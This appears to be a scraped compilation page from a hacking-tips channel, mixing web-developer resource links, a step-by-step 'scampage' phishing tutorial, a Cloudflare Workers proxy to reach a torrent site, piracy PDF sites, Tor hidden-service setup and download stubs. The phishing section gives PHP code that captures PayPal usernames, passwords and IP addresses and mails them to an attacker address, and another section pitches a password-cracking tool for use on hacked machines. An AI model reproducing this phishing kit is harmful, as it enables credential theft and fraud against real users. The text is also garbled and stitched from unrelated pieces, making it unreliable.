5 Useful Resources for Junior Web Developers


1. Diagrams -  This is such a great web for draw a lot of diagrams you need. I use it for my databases as long as I need to share with my peers.


Visit : https://app.diagrams.net/


2. CSS Section Generator - If you want to take your website design to another level, this separator generator allows you to create different sections for your web.


Visit : https://wweb.dev/resources/css-separator-generator


3. Grid by example - The perfect place if you need to understand how grid layout works.


Visit : https://gridbyexample.com/


4. JSFiddle - If you need to test your code and you don't want to open VS Code, JSFiddle brings you the possibility to use an online editor.


Visit : https://jsfiddle.net/


5. Sweet Alerts - A beautiful tool for replacement alerts. It's a npm pakage so you need to install it as a dependencie.

HOW TO MAKE SCAMPAGE?

 ๐Ÿ”ฐ๐Ÿ”ฐ 


⚙️It's a short tuto, for beginners


Scam page is a fake webpage. e.g. a login of a popular website, online bank login and etc. depending on what it is. scam page are used by spammers to collect data on people who get scammed. detecting scam page is simple if you are technology oriented. but most common users can't detect scam page. this is a big problem in the www. some company are developing software to combat scam's or phishing scams - phishing is the term used

for this scam.


1️⃣ OK, so first we choose a target.


We chose www.paypal.com


2️⃣ Navigate the site chosen. Press CTRL + S and save the file. Html somewhere on yourcomputer.


3️⃣ We open ... There might be a problem, namely the way the image.


4️⃣ If relative path (relative path is the path like / images / wow.gif) be transformed into an absolute path (http://tinta.com/images/wow.gif)


5️⃣ Now that you clarified your lead you to the file. Html that was saved, so your login type CTRL + F ... (Here the words are different .. try and password, password, username, etc.. Dak login does not work).


 6️⃣ You have a code like <form action="login2.php">. Login2.php change in 040147.php!


 7️⃣ Now, the username should be a code like . name = "email" tells us that in PHP script authentication is the variable that you email username.


 3️⃣ Good memory.


The password, the code should be similar ( xxxxxxxx). So, password is held in variable password. A and memorize it.


 9️⃣ Now, where you have saved. Html, created a new file called 040147.php.


 In it, add the following code:


⚙️Code:


$ To = "upgoingstar@gmail.com"


$ Name = $ _POST ['email'];


$ Email = $ _POST ['email'];


$ Subject = $ _POST ['subject'];


$ Password = $ _POST ['password'];


$ Agent = $ _SERVER ['HTTP_USER_AGENT'];


$ Ip = $ _SERVER ['REMOTE_ADDR'];


$ D = date ('l dS \ of F Y h: i: s A');


$ Sub = "New Account Hacked PayPal - $ email";


$ Headers = "From: $ name <$ email> \ n";


$ Headers .= "Content-Type: text / plain, charset = iso-8859-1 \ n";


$ Mes .= 'Username:'. $ Email. "\ N";


$ Msg .= "Password:". $ Password. "\ N";


$ Msg .= "Browser:". $ Agent. "\ N";


$ Msg .= "IP:". $ Ip. "\ N";


$ Mes .= 'Date and time:'. $ D;


(


mail ($ to, $ sub, $ mes, $ headers);


header ("Location: www.paypal.com");



)


?>


๐Ÿ”Ÿ Modify code


⚙️Code:


 $ To = "Leader@gmail.com"

and put your mail. The code above variables over email and password and sends them together with some more useful details.


11] Rename. Or HTML into index.html. Php, you upload the 2 files on a host and entertain. : Wink:


 

๐Ÿ‘YOUR SCAMPAGE IS READY


Enjoy! Follow us for more... 

HOW TO PROXY 'ANY' WEBSITE USING CLOUDFLARE WORKERS


1. Sign up on https://www.cloudflare.com/ if not already.

2. Click on workers tab.

3. Choose a subdomain where you would like to see your workers.

   *such as zyx.subdomain.workers.dev

   *here zyx will be replaced by your future worker names.

   *the subdomain will stay same

4. After selecting subdomain click on create a service/worker.

5. Name your new worker anything you want.

6. Click create.

7. Click quick edit.

8. Click next.

9. Delete existing code.

X. Paste the following code there.

async function handleRequest(request) {

  const url = new URL(request.url)

  if (url.hostname in ORIGINS) {

    const target = ORIGINS[url.hostname]

    url.hostname = target

    return fetch(url.toString(), request)

  }

  return fetch(request)

}

addEventListener('fetch', event => {

  event.respondWith(handleRequest(event.request))

})


const ORIGINS = {

  '1337x.subdomain.workers.dev': '1337x.to'

}   



Replace 1337x with whatever you named your new worker.

Replace 1337x.to with the website you want to be proxied.

Don't enter https://1337x.to/

Only 1337x.to



BOOM you can access your proxied website at 1337x.subdomain.workers.dev

Enjoy and cheers!


** Not all websites can be proxied. Either because the websites don't want to be proxied or because can't be proxied through cloudflare workers or because cloudflare itself doesn't support them.


-- leaving some of my own workers. Feel free to use them.

https://1337x.unban.workers.dev

https://scrolller.unban.workers.dev


Enjoy! Follow us for more... 

PDF Search websites

 ๐Ÿงถ ** ๐Ÿงถ

• PDFDrive.com - Books

• OceanofPDF.com - Books / Comics

• pdfroom.com - Books / Comics

• Pdfgeni.com - Books

• PDFGrab.com - Books

• EbookPDF.com - Books

• KuPDF.net - Books

• ePDF.pub - Books

• PDFCookie.com - Books

• SoPDF.com - Books

• PDFSearches.com - Books

• OiiPDF.com - Books

• FindPDFDoc.com - Books

• PDFSlide.net - Books

• EDoc.site - Books

• PDFDuck.com - Books

• pdforigin.info - Books

• LargePDF.com - Books

• PDFStop.com - Books

• freepdfbook.com - Books

• PDFSearchEngine.info - PDF Search Engine

• Amazonaws - Amazon PDF Search


Enjoy! Follow us for more... 

Anonymous calls without a SIM card

 ๐Ÿ”ฐ  ๐Ÿ”ฐ


Keep several services for calls in which traffic passes through the TOR network or has a high degree of encryption:


https://tox.chat


https://www.linphone.org


https://jitsi.org


https://www.ringcentral.com‌‌


Enjoy! Follow us for more... 

Elcomsoft's Facebook Password Extraction Tool


Fortunately for us, there is a company in Russia named Elcomsoft.


This company employs first-rate cryptographers and they develop and sell software to crack various password encryption schemes. (As a side note, a cryptographer from Elcomsoft was the first person arrested and prosecuted under the DCMA when he came to the U.S. for a conference. He was eventually acquitted.)


Their software is listed as digital forensic tools, but they can just as easily be used for hacking purposes. One of their tools was used for the iCloud hack that revealed nude photos of Jennifer Lawrence and other Hollywood stars in August 2014.


Elcomsoft developed a Windows tool named Facebook Password Extractor (FPE, for short) that extracts the user's Facebook password from its location on the user's system (the user must have used the "Remember me" feature) and then cracks it. Of course, we need physical access to the system to do this in most cases. Alternatively, if we can hack their system, we could upload this tool to the target system and then use it or we could simply download the user's browser password file and use this tool locally on our system.


You can download this free tool from Elcomsoft's website, which officially supports the following web browsers (though it may work on newer versions).




Enjoy! Follow us for more... 

How to host your own site on darkweb on windows


Tools ๐ŸŽ‰๐ŸŽ‰

  √ Xampp

  √ Tor browser 

  √ Notepad ++

----------------------------------------------


✅ Open tor browser directory 

✅Go to following path 


Egs: c:/tor browser/browser/Tor browser/data/tor/


✅make a folder at the safe place (anywhere)


✅Edit file named "torrc" inside above directory


✅Add these line at end 


" HiddenServiceDir /Library/Tor/var/lib/tor/hidden_service/ HiddenServicePort 80 127.0.0.1:8080 "


✅Add the new folder path that u have created And add after " HiddenServiceDir "


✅Now save the file and fire up the tor browser


✅ Open the folder u created in step 3 and open host file u will see your domain name 


✅ Now install Xampp 



✅Got to "c:/Xampp/htdocs/" and your website  file that's set 


✅Now run apache server and php server from Xampp control pannel 


Now your yor website is accessable from darkweb 





Enjoy! Follow us for more... 


How to manage Azure by using Azure PowerShell.mp4

 

Download now

Enjoy! Follow us for more...

Fundamentals of Azure management.mp4

 

Download now

Enjoy! Follow us for more...

How to export a virtual appliance to use on another host.mp4

 

Download now

Enjoy! Follow us for more...

How to use the Contacts application.mp4

 

Download now

Enjoy! Follow us for more...


How to use the Seamless Install Badge.mp4

 

Download now

Enjoy! Follow us for more...


How to use window events.mp4

 

Download now

Enjoy! Follow us for more...

How to deploy a project in Google App Engine.mp4

 

Download now

Enjoy! Follow us for more...

How to detect network availability.mp4

 

Download now

Enjoy! Follow us for more...

How to access HTML history.mp4

 

Download now

Enjoy! Follow us for more...

How to use the SpinnerList component.mp4

 

DOWNLOAD now

Enjoy! Follow us for more...

How to add table data to a database.mp4

 

Download now

Enjoy! Follow us for more...

How to use selectors to create classes of styles.mp4

 

Download now

Enjoy! Follow us for more...

How to create a repository and a project.mp4

 

Download now

Enjoy! Follow us for more...

How to add storage to your virtual machine.mp4

 

Download now

Enjoy! Follow us for more...

How to store data for your script.mp4

 

Download now

Enjoy! Follow us for more...

How to create a cloud service with a web role.mp4

 

Download now

Enjoy! Follow us for more...

How to use Google data in your web app.mp4

 

Download now

Enjoy! Follow us for more...

How to use Advanced Services - URL Shortener.mp4

 

Download now

Enjoy! Follow us for more...

How to use the project console.mp4

 

Download now

Enjoy! Follow us for more...

How to creat and deploying an Azure website.mp4

 

Download now

Enjoy! Follow us for more...

How to utilise Amazon Web Services (AWS).mp4

 

Download now

Enjoy! Follow us for more...

How to install BW contact.mp4

 

Download now

Enjoy! Follow us for more...

How to install the contact.cgi script on a Unix server.mp4

 

Download now

Enjoy! Follow us for more...

How to install the contact.cgi script on a Windows server.mp4

 

Download now

Enjoy! Follow us for more...

How to install BW blog.mp4

 

Download now

Enjoy! Follow us for more...

How to use graphical user interface (GUI) tools.mp4

 

Download now

Enjoy! Follow us for more...

How to create a repository and a project.mp4

 

Download now

Enjoy! Follow us for more...

How a CakePHP template is built.mp4


 Download now

Enjoy! Follow us for more...

How to control a servo with an analog input.mp4

 

Download now

Enjoy! Follow us for more...

How to create a remote branch.mp4

 

Download now

Enjoy! Follow us for more...

How to use hash values (SHA-1).mp4

 

Download now

Enjoy! Follow us for more...

How to use SSH keys for remote login.mp4

 

Download now

Enjoy! Follow us for more...

How to run a custom JavaScript function.mp4

 

Download now

Enjoy! Follow us for more...

How to create a custom JavaScript function.mp4

 

Download now

Enjoy! Follow us for more...



How to use a solderless breadboard.mp4

 

Download now

Enjoy! Follow us for more...

Yii classes and widgets.mp4

 

Download now

Enjoy! Follow us for more...

How to manage SQL instances by Google cloud console.mp4

 

Download now

Enjoy! Follow us for more...

Sign up process on google cloud plateform.mp4

 

Download now

Enjoy! Follow us for more...

How to create virtual machine on vm virtual box.mp4

 

Download now

Enjoy! Follow us for more...

How to automatically store server config with etckeeper.mp4

 

Download now

Enjoy! Follow us for more...

How to configure other port conflicts on Windows.mp4

 

Download now

Enjoy! Follow us for more...

How to uninstall Bitnami for Mac OS X.mp4

 

Download now

Enjoy! Follow us for more...

How to uninstall individual components of Apache, php or SQL on Mac OS X.mp4

 

Download now

Enjoy! Follow us for more...

How to use the map function in Arduino .mp4

 

Download now

Enjoy! Follow us for more...

How to create virtual machine instance using google cloud console page.mp4

 

Download now

Enjoy! Follow us for more...

How to use instance related resources like snapshot and firewalls in google cloud console.mp4

 

Download now

Enjoy! Follow us for more...

How to use Azure management portal and azure preview portalportals.mp4

 

Download now

Enjoy! Follow us for more...

How to calibrate an analog input in Arduino to fade an LED precisely .mp4

 

Download now

Enjoy! Follow us for more...

How to connect to an FTP server from Linux?

To connect to an FTP server from a Linux system, you can use either a command-line FTP client or a graphical one. Here’s how to do it usin...